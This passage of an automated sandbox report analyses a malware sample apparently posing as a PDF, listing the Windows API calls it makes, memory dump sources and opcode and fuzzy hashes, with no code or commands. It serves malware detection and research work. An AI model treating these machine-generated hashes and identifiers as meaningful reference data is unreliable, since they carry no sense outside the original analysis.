                                                                                                                                                                                • Opcode Fuzzy Hash: 1f24f0cd53c1855ed6b40fe65ea12733927bf232cd7ac798f5bce6c5a5c4e986
                                                                                                                                                                                • Instruction Fuzzy Hash: B352CC74E00219CFCB54DF68E994A9DBBB2FB48301F1095A9D809E7364EB746E85CF81
                                                                                                                                                                                APIs
                                                                                                                                                                                • KiUserCallbackDispatcher.NTDLL(00000014,?,?,046642A8,0376EA38,?,00000000), ref: 07610FE6
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4181157256.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7610000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CallbackDispatcherUser
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2492992576-0
                                                                                                                                                                                • Opcode ID: 18c25f175e15c2c8e87377c47fa9c48df7643616fa3911c8c6b0dbcdfa27e130
                                                                                                                                                                                • Instruction ID: ba86ba21eeefeb122c87d880ff6b918f13105b7cc18be967893bb61313213f9e
                                                                                                                                                                                • Opcode Fuzzy Hash: 18c25f175e15c2c8e87377c47fa9c48df7643616fa3911c8c6b0dbcdfa27e130
                                                                                                                                                                                • Instruction Fuzzy Hash: 68718F74A01249EFDB14DFA9D888D9EBBB6FF49610F154099F902AB361DB31E881CB50
                                                                                                                                                                                APIs
                                                                                                                                                                                • KiUserCallbackDispatcher.NTDLL(00000003,00000000,00000000,?,?,?,00000000), ref: 07612926
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4181157256.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7610000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CallbackDispatcherUser
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2492992576-0
                                                                                                                                                                                • Opcode ID: 383be21155bda321db3d5d971a32f30fd0672986721acae628e02d475eb40fb1
                                                                                                                                                                                • Instruction ID: eeee776efa8bb9f799942d466fcee7f6ae1bc7bde0913f40975ab340e62058b5
                                                                                                                                                                                • Opcode Fuzzy Hash: 383be21155bda321db3d5d971a32f30fd0672986721acae628e02d475eb40fb1
                                                                                                                                                                                • Instruction Fuzzy Hash: 2F21FFB2B001119FEB14DB69D815BAEB7A6FFC8314F088178E50A97394DB34EC25CB94
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 05B6900A
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4172891156.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_5b60000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CurrentThread
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2882836952-0
                                                                                                                                                                                • Opcode ID: 9478199f4cc7653de450eba10cc8c21cc6a2c0136a0c2b666cc0e0c055d10577
                                                                                                                                                                                • Instruction ID: 4585ed487a2bc04e52e1746b066587ab3a91638241325770617cc46d9e1718dd
                                                                                                                                                                                • Opcode Fuzzy Hash: 9478199f4cc7653de450eba10cc8c21cc6a2c0136a0c2b666cc0e0c055d10577
                                                                                                                                                                                • Instruction Fuzzy Hash: 923157B590024A8FCB11DFA9D544ADEFBF0FF48314F14859AD459AB351C734A988CFA1
                                                                                                                                                                                APIs
                                                                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05B6741F
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4172891156.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_5b60000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                                                                • Opcode ID: 18381a7e8d706b72cd54c48941cfd4a9cf60ba2dfbf5d4ce54bcf39866bece34
                                                                                                                                                                                • Instruction ID: bf13b20c6ade5f6c238dcf4cd20ce784a7641d5c265c884bc9712479e67b01c0
                                                                                                                                                                                • Opcode Fuzzy Hash: 18381a7e8d706b72cd54c48941cfd4a9cf60ba2dfbf5d4ce54bcf39866bece34
                                                                                                                                                                                • Instruction Fuzzy Hash: 392114B59002189FDB10CFAAD584ADEFFF8FB48324F14801AE958A7310D378A944CFA5
                                                                                                                                                                                APIs
                                                                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05B6741F
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4172891156.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_5b60000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                                                                • Opcode ID: d9ca266f88ea90240983cec383b83fc80bf5d4fd5762fff5168219755e137b55
                                                                                                                                                                                • Instruction ID: 674178322b5361d8affda6f3b39f76091f65d8c23faa580c7a3c84c7cae9eb82
                                                                                                                                                                                • Opcode Fuzzy Hash: d9ca266f88ea90240983cec383b83fc80bf5d4fd5762fff5168219755e137b55
                                                                                                                                                                                • Instruction Fuzzy Hash: FE21F5B59002599FDB10CFAAD584ADEFFF8FB48324F14801AE918A7310D378A954CFA4
                                                                                                                                                                                APIs
                                                                                                                                                                                • EnumThreadWindows.USER32(?,00000000,?), ref: 05B690E9
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4172891156.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_5b60000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: EnumThreadWindows
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2941952884-0
                                                                                                                                                                                • Opcode ID: c008f86e96c770a4bd60400947875323f87145f6a91413edca7e45977fa2b39c
                                                                                                                                                                                • Instruction ID: fdae4a6042cd513e0c7a9b3828d8657376cd2a02e5d77fae9cbe01c73d08d8cc
                                                                                                                                                                                • Opcode Fuzzy Hash: c008f86e96c770a4bd60400947875323f87145f6a91413edca7e45977fa2b39c
                                                                                                                                                                                • Instruction Fuzzy Hash: 622135B1D0025A8FDB14CFAAC844BEEFBF4FB88310F14846AE458A7250D778A945CF65
                                                                                                                                                                                APIs
                                                                                                                                                                                • EnumThreadWindows.USER32(?,00000000,?), ref: 05B690E9
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4172891156.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_5b60000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: EnumThreadWindows
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2941952884-0
                                                                                                                                                                                • Opcode ID: a59f50c9bc8b065320525ff2c4676eb83cea4d20710cf5f0a92506f9c530af89
                                                                                                                                                                                • Instruction ID: 9392082e0b2c9c5f4f7c2b1673bd238e8663b749a510ebb53b345848c8f5b3d6
                                                                                                                                                                                • Opcode Fuzzy Hash: a59f50c9bc8b065320525ff2c4676eb83cea4d20710cf5f0a92506f9c530af89
                                                                                                                                                                                • Instruction Fuzzy Hash: 1B2108B19002198FDB14CF9AC844BEEFBF9FB88324F14842AE459A7250D778A945CF65
                                                                                                                                                                                APIs
                                                                                                                                                                                • MessageBoxW.USER32(?,00000000,00000000,?), ref: 05B69485
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4172891156.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_5b60000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Message
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2030045667-0
                                                                                                                                                                                • Opcode ID: 87313919053ea9962bf8301be06cd913553f1c10e9984a51b9d585cd71dc46dc
                                                                                                                                                                                • Instruction ID: 4518581eb51efb934d132e62dcb7e690092cf85aa5ed02d651f961004623ac69
                                                                                                                                                                                • Opcode Fuzzy Hash: 87313919053ea9962bf8301be06cd913553f1c10e9984a51b9d585cd71dc46dc
                                                                                                                                                                                • Instruction Fuzzy Hash: DF210FB6D00319DFCB20CF9AD984ADEFBB5FB48310F14846AE859A7600D379A544CBA0
                                                                                                                                                                                APIs
                                                                                                                                                                                • MessageBoxW.USER32(?,00000000,00000000,?), ref: 05B69485
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4172891156.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_5b60000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Message
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2030045667-0
                                                                                                                                                                                • Opcode ID: 92f80c0e169d758884f99558551efb7613ea4d1cfaed00eec79954d986478ef9
                                                                                                                                                                                • Instruction ID: ad08b547f2cf27d0413f357de9d0a50820c182e3accd5f13695812a5ad6cbd19
                                                                                                                                                                                • Opcode Fuzzy Hash: 92f80c0e169d758884f99558551efb7613ea4d1cfaed00eec79954d986478ef9
                                                                                                                                                                                • Instruction Fuzzy Hash: 4B2113B69003599FCB20CF9AD884ADEFBF5FB48310F10846EE819A7200C375A544CFA4
                                                                                                                                                                                APIs
                                                                                                                                                                                • PostMessageW.USER32(?,?,?,?), ref: 08A53CE5
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4182149276.0000000008A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A50000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_8a50000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessagePost
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 410705778-0
                                                                                                                                                                                • Opcode ID: 907b021ed3113d3909a0addfab936845d27f05a6c7cb7ffe94ba8306479fdd59
                                                                                                                                                                                • Instruction ID: 6c747dcf5d8a7ae437fc6cb159b9c1540b15d2ecf08b4306a1c33e96e7f7539d
                                                                                                                                                                                • Opcode Fuzzy Hash: 907b021ed3113d3909a0addfab936845d27f05a6c7cb7ffe94ba8306479fdd59
                                                                                                                                                                                • Instruction Fuzzy Hash: 6D1146B58002499FDB10CF9AC485BDEFBF8EB48324F10841AE954A3600D378A588CFA5
                                                                                                                                                                                APIs
                                                                                                                                                                                • SendMessageW.USER32(?,?,?,?), ref: 05B6987D
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4172891156.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_5b60000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                                • Opcode ID: 32c6454af4e75ce459abb77ee6b38ac189e8a50bbe765b812c4582e3b3889c99
                                                                                                                                                                                • Instruction ID: 32dc091c75c4b92b86e41ac7ff50f41c003bba8b93c4219c25ce7838cbebf6e4
                                                                                                                                                                                • Opcode Fuzzy Hash: 32c6454af4e75ce459abb77ee6b38ac189e8a50bbe765b812c4582e3b3889c99
                                                                                                                                                                                • Instruction Fuzzy Hash: 861125B58003499FCB10DF9AD485BDEBFF8FB48320F10845AE558A7210D375A984CFA1
                                                                                                                                                                                APIs
                                                                                                                                                                                • PostMessageW.USER32(?,?,?,?), ref: 08A53CE5
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4182149276.0000000008A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A50000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_8a50000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessagePost
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 410705778-0
                                                                                                                                                                                • Opcode ID: aab3788e2054498b66ca333ef64b41c78612297503f595ff9ff0426ad3653529
                                                                                                                                                                                • Instruction ID: 3736db24f75fb8bae49f713bf9877c44c1222b4b8922a8f148f2f79fd86d3d69
                                                                                                                                                                                • Opcode Fuzzy Hash: aab3788e2054498b66ca333ef64b41c78612297503f595ff9ff0426ad3653529
                                                                                                                                                                                • Instruction Fuzzy Hash: 7A1136B1800349CFDB10CF9AC945BDEFBF8EB48324F108419E954A3650D378A584CFA5
                                                                                                                                                                                APIs
                                                                                                                                                                                • OleInitialize.OLE32(00000000), ref: 05B6821D
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4172891156.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_5b60000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Initialize
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2538663250-0
                                                                                                                                                                                • Opcode ID: 2b6bba26bd92aa19be129ce4d515e47352b347392a34d73855ce46376040772c
                                                                                                                                                                                • Instruction ID: fe2e5e85a6b45de2357e259f6ba13fe86de54c0bfbd2231716ab23faf1a2cf25
                                                                                                                                                                                • Opcode Fuzzy Hash: 2b6bba26bd92aa19be129ce4d515e47352b347392a34d73855ce46376040772c
                                                                                                                                                                                • Instruction Fuzzy Hash: 141133B59006488FCB20DF9AD448BCEBBF8EB48324F248459E558A7210D378A544CFA5
                                                                                                                                                                                APIs
                                                                                                                                                                                • OleInitialize.OLE32(00000000), ref: 05B6821D
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4172891156.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_5b60000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Initialize
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2538663250-0
                                                                                                                                                                                • Opcode ID: 86937942358eb0ba12670ea476673bdc4cae3e164570a8674536958ecae55b43
                                                                                                                                                                                • Instruction ID: 8ef1f2f9b05bd32f51aab3e97b2dc9b0eed9fb81f889b21fa20f43e6b992ae75
                                                                                                                                                                                • Opcode Fuzzy Hash: 86937942358eb0ba12670ea476673bdc4cae3e164570a8674536958ecae55b43
                                                                                                                                                                                • Instruction Fuzzy Hash: BD1100B19006488FCB20DF9AD588BDEBBF8EB48324F248459E559A7210D378A944CFA5
                                                                                                                                                                                APIs
                                                                                                                                                                                • SendMessageW.USER32(?,?,?,?), ref: 05B6987D
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4172891156.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_5b60000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                                • Opcode ID: 5eabb4d5e9f38470b99071e26349ffeaa404bcc1d8134084150cddf968e93b7f
                                                                                                                                                                                • Instruction ID: 5f2507c231e1891675c1371ad72d9cf1c39979a36c27db5887837a382a8171c2
                                                                                                                                                                                • Opcode Fuzzy Hash: 5eabb4d5e9f38470b99071e26349ffeaa404bcc1d8134084150cddf968e93b7f
                                                                                                                                                                                • Instruction Fuzzy Hash: 251103B58003499FDB10DF9AC444BDEBBF8FB48320F10845AE958A7210C375A944CFA5
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: (o^q
                                                                                                                                                                                • API String ID: 0-74704288
                                                                                                                                                                                • Opcode ID: be904c60c863cf4f9fd445aeab2059bceae8d95afd8f46369e49883b62646083
                                                                                                                                                                                • Instruction ID: d327c57dac73237e0b1823084fe6897f71e12f53881e0ce26574404b35064c55
                                                                                                                                                                                • Opcode Fuzzy Hash: be904c60c863cf4f9fd445aeab2059bceae8d95afd8f46369e49883b62646083
                                                                                                                                                                                • Instruction Fuzzy Hash: F541E232B002148FCB169F68D854AAEBBF6FFDD310F18446AE916D7391DE359C068790
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 9d984391c9cd189caadf33b4980e7e13f62f7cbe0186ee68d704ac5ee53eaafe
                                                                                                                                                                                • Instruction ID: c0129a1b6b1788c8bbc48cc2213218821f3ef57fce5eedcd091074b53cda849c
                                                                                                                                                                                • Opcode Fuzzy Hash: 9d984391c9cd189caadf33b4980e7e13f62f7cbe0186ee68d704ac5ee53eaafe
                                                                                                                                                                                • Instruction Fuzzy Hash: 5A129935CA17438FE3512B20E6AC2AA7A68FF5F363744AE11E10FC0855DB7914A98F61
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5e83b07db0a357284507461b6fb533757aaa3b9ef599d454a26546675c145876
                                                                                                                                                                                • Instruction ID: 41df4b1d7033b07e584cafad41e101c55c40340d5817abe54fdc6776af8d105a
                                                                                                                                                                                • Opcode Fuzzy Hash: 5e83b07db0a357284507461b6fb533757aaa3b9ef599d454a26546675c145876
                                                                                                                                                                                • Instruction Fuzzy Hash: 26129935CA17438FE3512B20E6AC2AA7A68FF1F3637446E11E10FC0855DB7914A98F61
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: c504d2c0de65a67a20d668476e76b5b6daa1861684eda4794c03d4769bae000d
                                                                                                                                                                                • Instruction ID: b842f7014618c1406f8af223ee48fb8822ee08209b9ce6e076da6293e7ce8b4e
                                                                                                                                                                                • Opcode Fuzzy Hash: c504d2c0de65a67a20d668476e76b5b6daa1861684eda4794c03d4769bae000d
                                                                                                                                                                                • Instruction Fuzzy Hash: 599124319006258FCB15CF2CC8D45AABFF5EF95328F55C666D96897352D331E812CBA0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: afa05c37469565d9ac7c11be73c97014f5596d198f9f2a28db9ff14e1af71442
                                                                                                                                                                                • Instruction ID: a52c19f022ed9466aeeb7b7377a492102a5950bcec7e58fbb0f88036ebe7a4b4
                                                                                                                                                                                • Opcode Fuzzy Hash: afa05c37469565d9ac7c11be73c97014f5596d198f9f2a28db9ff14e1af71442
                                                                                                                                                                                • Instruction Fuzzy Hash: C2718C347006258FDB15CF2CC884A6E7BE5BF6A608F1900A9E925DB3B1DB75DC41DB50
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 167affc971e440eaf1b1c39aaeaa900f573d809a1c9760588888d157b8a7b5ab
                                                                                                                                                                                • Instruction ID: 118722f866925ebee958f18efe498dbfd3ca71b6492c292a4a57421de0f86a22
                                                                                                                                                                                • Opcode Fuzzy Hash: 167affc971e440eaf1b1c39aaeaa900f573d809a1c9760588888d157b8a7b5ab
                                                                                                                                                                                • Instruction Fuzzy Hash: 4161E174E01219DFDB15CFA5D984BAEBBB2FF88304F208529D809AB354DB759986CF40
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 71a65b9b3377dec9f2daa50bf6801ffdaea1cd08009b47bf33fce382b2483c46
                                                                                                                                                                                • Instruction ID: 91499b2508a6dc0a9daf7590482f20efc4bbb89e3df1819d9e6a0a2e8d5b8519
                                                                                                                                                                                • Opcode Fuzzy Hash: 71a65b9b3377dec9f2daa50bf6801ffdaea1cd08009b47bf33fce382b2483c46
                                                                                                                                                                                • Instruction Fuzzy Hash: 73519274E01218DFDB54DFA9D98499DBBF2FF89300F249169E819AB364DB31A901CF50
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: b1cc8e57772547a544364e99b7ab628bdd02f750848585f028b4e284ff45b18a
                                                                                                                                                                                • Instruction ID: 4ba23512db1bb4e4ef3b138859589620d839a97702ecce7e833e6757e44f7efe
                                                                                                                                                                                • Opcode Fuzzy Hash: b1cc8e57772547a544364e99b7ab628bdd02f750848585f028b4e284ff45b18a
                                                                                                                                                                                • Instruction Fuzzy Hash: 7C51BF74E01218CFCB08DFA9D59489DBBF2FF89304B209169E819AB324DB35AD42CF51
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 4ff2d1f3787f2f1bc37b795ce1aa580d6bfcdcc4872305a5b49fa74d5a9ef220
                                                                                                                                                                                • Instruction ID: 23fb8e2ab15f3fc5800914a84f9c5c2b8a910314a564b09fb098ce5d252b0e30
                                                                                                                                                                                • Opcode Fuzzy Hash: 4ff2d1f3787f2f1bc37b795ce1aa580d6bfcdcc4872305a5b49fa74d5a9ef220
                                                                                                                                                                                • Instruction Fuzzy Hash: BA41E131A00269DFCF12CFA8C844A9DBFF2FF99318F048455E9699B692D374E915CB60
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 831cf171e7f13b42394a5fe5622a08ce32404941e8213eb65aca3e9cce35a5c3
                                                                                                                                                                                • Instruction ID: 5d56aa41201f902aabd5bde3825ac3885285b79067d734e2465892e4bba61309
                                                                                                                                                                                • Opcode Fuzzy Hash: 831cf171e7f13b42394a5fe5622a08ce32404941e8213eb65aca3e9cce35a5c3
                                                                                                                                                                                • Instruction Fuzzy Hash: D4319231700219DFCF029F69E854AAF7BA6FB98309F048424F925CB244DB39DE21DB91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 36f336542e22dd4869b75c709443269b2d71776d4ecd494e4149d9f253b620a9
                                                                                                                                                                                • Instruction ID: 6969e34614446f834317fae59e4baafa792783cf8de919523030179458ff0df7
                                                                                                                                                                                • Opcode Fuzzy Hash: 36f336542e22dd4869b75c709443269b2d71776d4ecd494e4149d9f253b620a9
                                                                                                                                                                                • Instruction Fuzzy Hash: 7A316574D092498FCB01DFB8D8445EEBFF8FF5A304F0041AAE854A7260EB745A85CBA1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 238bc9e670c1a90c84d069fbc8191c12314c88c71bc19229b8824e65fdf9179d
                                                                                                                                                                                • Instruction ID: 40f4b0e03be9464687c7f38fdf3f79e2af4e8b753991deb6d994dbe9f9d465d8
                                                                                                                                                                                • Opcode Fuzzy Hash: 238bc9e670c1a90c84d069fbc8191c12314c88c71bc19229b8824e65fdf9179d
